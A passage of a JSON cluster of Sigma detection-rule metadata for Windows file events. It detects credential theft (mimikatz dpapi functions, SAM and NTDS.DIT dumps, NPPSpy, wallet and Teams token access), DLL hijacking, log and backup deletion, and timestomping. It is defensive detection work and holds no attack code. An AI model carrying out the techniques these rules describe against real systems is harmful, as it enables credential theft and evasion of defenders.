"attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "value": "Office Macro File Download" }, { "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", "meta": { "author": "Subhash Popuri (@pbssubhash)", "creation_date": "2021-08-21", "falsepositive": [ "Any powershell script that creates bat files" ], "filename": "file_event_win_hktl_powerup_dllhijacking.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.001" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", "value": "HackTool - Powerup Write Hijack DLL" }, { "description": "Detects the creation of file by the \"node.exe\" process in the \".vscode-server\" directory. Could be a sign of remote file creation via VsCode tunnel feature\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Unknown" ], "filename": "file_event_win_vscode_tunnel_remote_creation_artefacts.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "56e05d41-ce99-4ecd-912d-93f019ee0b71", "value": "Visual Studio Code Tunnel Remote File Creation" }, { "description": "Detects the creation of new files with the \".evtx\" extension in non-common or non-standard location.\nThis could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.\nNote that backup software and legitimate administrator might perform similar actions during troubleshooting.\n", "meta": { "author": "D3F7A5105", "creation_date": "2023-01-02", "falsepositive": [ "Administrator or backup activity", "An unknown bug seems to trigger the Windows \"svchost\" process to drop EVTX files in the \"C:\\Windows\\Temp\" directory in the form \"_.evtx\". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files" ], "filename": "file_event_win_create_evtx_non_common_locations.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "value": "EVTX Created In Uncommon Location" }, { "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Legitimate use of the profile by developers or administrators" ], "filename": "file_event_win_susp_vscode_powershell_profile.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.013" ] }, "related": [ { "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "value": "VsCode Powershell Profile Modification" }, { "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", "meta": { "author": "C.J. May", "creation_date": "2022-08-09", "falsepositive": [ "Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise" ], "filename": "file_event_win_bloodhound_collection.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" ], "tags": [ "attack.discovery", "attack.t1087.001", "attack.t1087.002", "attack.t1482", "attack.t1069.001", "attack.t1069.002", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", "value": "BloodHound Collection Files" }, { "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-29", "falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_nppspy.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://twitter.com/0gtweet/status/1465282548494487554", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", "value": "HackTool - NPPSpy Hacktool Usage" }, { "description": "Ransomware create txt file in the user Desktop", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_desktop_txt.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "value": "Suspicious Creation TXT File in User Desktop" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "file_event_win_gotoopener_artefact.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "value": "GoToAssist Temporary Installation Artefact" }, { "description": "Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).\nUsually this technique is used to achieve DLL hijacking.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "creation_date": "2022-12-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_create_non_existent_dlls.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", "https://github.com/Wh04m1001/SysmonEoP", "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc", "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "value": "Creation Of Non-Existent System DLL" }, { "description": "Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_perflogs_susp_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bbb7e38c-0b41-4a11-b306-d2a457b7ac2b", "value": "Suspicious File Created In PerfLogs" }, { "description": "Detects the creation of files in a specific location by ScreenConnect RMM.\nScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to \":\\Users\\\\Documents\\ConnectWiseControl\\Temp\\\" before execution.\n", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use of ScreenConnect" ], "filename": "file_event_win_remote_access_tools_screenconnect_remote_file.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0afecb6e-6223-4a82-99fb-bf5b981e92a5", "value": "Remote Access Tool - ScreenConnect Temporary File" }, { "description": "Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_exfil_tools.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "value": "NTDS Exfiltration Filename Patterns" }, { "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-11", "falsepositive": [ "Rare cases of administrative activity" ], "filename": "file_event_win_sam_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/FireFart/hivenightmare", "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934", "https://github.com/search?q=CVE-2021-36934", "https://github.com/HuskyHacks/ShadowSteal", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "value": "Potential SAM Database Dump" }, { "description": "Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\", etc.", "meta": { "author": "frack113", "creation_date": "2022-07-16", "falsepositive": [ "Backup software" ], "filename": "file_rename_win_ransomware.yml", "level": "medium", "logsource.category": "file_rename", "logsource.product": "windows", "refs": [ "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "value": "Suspicious Appended Extension" }, { "description": "Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "file_access_win_susp_dpapi_master_key_access.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", "http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_dpapi_master_key_access.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", "value": "Access To Windows DPAPI Master Keys By Uncommon Applications" }, { "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-11", "falsepositive": [ "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], "filename": "file_access_win_susp_credential_manager_access.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_credential_manager_access.yml" ], "tags": [ "attack.t1003", "attack.credential-access" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "value": "Credential Manager Access By Uncommon Applications" }, { "description": "Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.", "meta": { "author": "frack113", "creation_date": "2023-12-21", "falsepositive": [ "Unknown" ], "filename": "file_access_win_susp_gpo_files.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://github.com/vletoux/pingcastle", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_gpo_files.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d51694fe-484a-46ac-92d6-969e76d60d10", "value": "Access To Potentially Sensitive Sysvol Files By Uncommon Applications" }, { "description": "Detects file access requests to crypto currency files by uncommon processes.\nCould indicate potential attempt of crypto currency wallet stealing.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2024-07-29", "falsepositive": [ "Antivirus, Anti-Spyware, Anti-Malware Software", "Backup software", "Legitimate software installed on partitions other than \"C:\\\"", "Searching software such as \"everything.exe\"" ], "filename": "file_access_win_susp_crypto_currency_wallets.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_crypto_currency_wallets.yml" ], "tags": [ "attack.t1003", "attack.credential-access" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f41b0311-44f9-44f0-816d-dd45e39d4bc8", "value": "Access To Crypto Currency Wallets By Uncommon Applications" }, { "description": "Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.\n", "meta": { "author": "@SerkinValery", "creation_date": "2024-07-22", "falsepositive": [ "Unknown" ], "filename": "file_access_win_teams_sensitive_files.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens", "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_teams_sensitive_files.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65744385-8541-44a6-8630-ffc824d7d4cc", "value": "Microsoft Teams Sensitive File Access By Uncommon Applications" }, { "description": "Detects file access requests to the Windows Credential History File by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "file_access_win_susp_credhist.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_credhist.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "value": "Access To Windows Credential History File By Uncommon Applications" }, { "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Changes made to or by the local NTP service" ], "filename": "file_change_win_2022_timestomping.yml", "level": "high", "logsource.category": "file_change", "logsource.product": "windows", "refs": [ "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" ], "tags": [ "attack.t1070.006", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "value": "File Creation Date Changed to Another Year" }, { "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "file_change_win_unusual_modification_by_dns_exe.yml", "level": "high", "logsource.category": "file_change", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "value": "Unusual File Modification by dns.exe" }, { "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Cedric MAURUGEON", "creation_date": "2021-09-29", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_prefetch.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "value": "Prefetch File Deleted" }, { "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", "meta": { "author": "frack113", "creation_date": "2022-01-02", "falsepositive": [ "Legitime usage" ], "filename": "file_delete_win_delete_backup_file.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", "value": "Backup Files Deleted" }, { "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "value": "Unusual File Deletion by Dns.exe" }, { "description": "Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.\n", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2024-09-03", "falsepositive": [ "Some false positives are to be expected from uninstallers." ], "filename": "file_delete_win_delete_own_image.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_own_image.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f01d1f70-cd41-42ec-9c0b-26dd9c22bf29", "value": "Process Deletion of Its Own Executable" }, { "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-16", "falsepositive": [ "During uninstallation of the IIS service", "During log rotation" ], "filename": "file_delete_win_delete_iis_access_logs.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", "value": "IIS WebServer Access Logs Deleted" }, { "description": "Detects the deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-04", "falsepositive": [ "Other third party applications not listed." ], "filename": "file_delete_win_zone_identifier_ads_uncommon.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3109530e-ab47-4cc6-a953-cac5ebcc93ae", "value": "ADS Zone.Identifier Deleted By Uncommon Application" }, { "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Possible FP during log rotation" ], "filename": "file_delete_win_delete_exchange_powershell_logs.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "value": "Exchange PowerShell Cmdlet History Deleted" }, { "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-07-01", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ 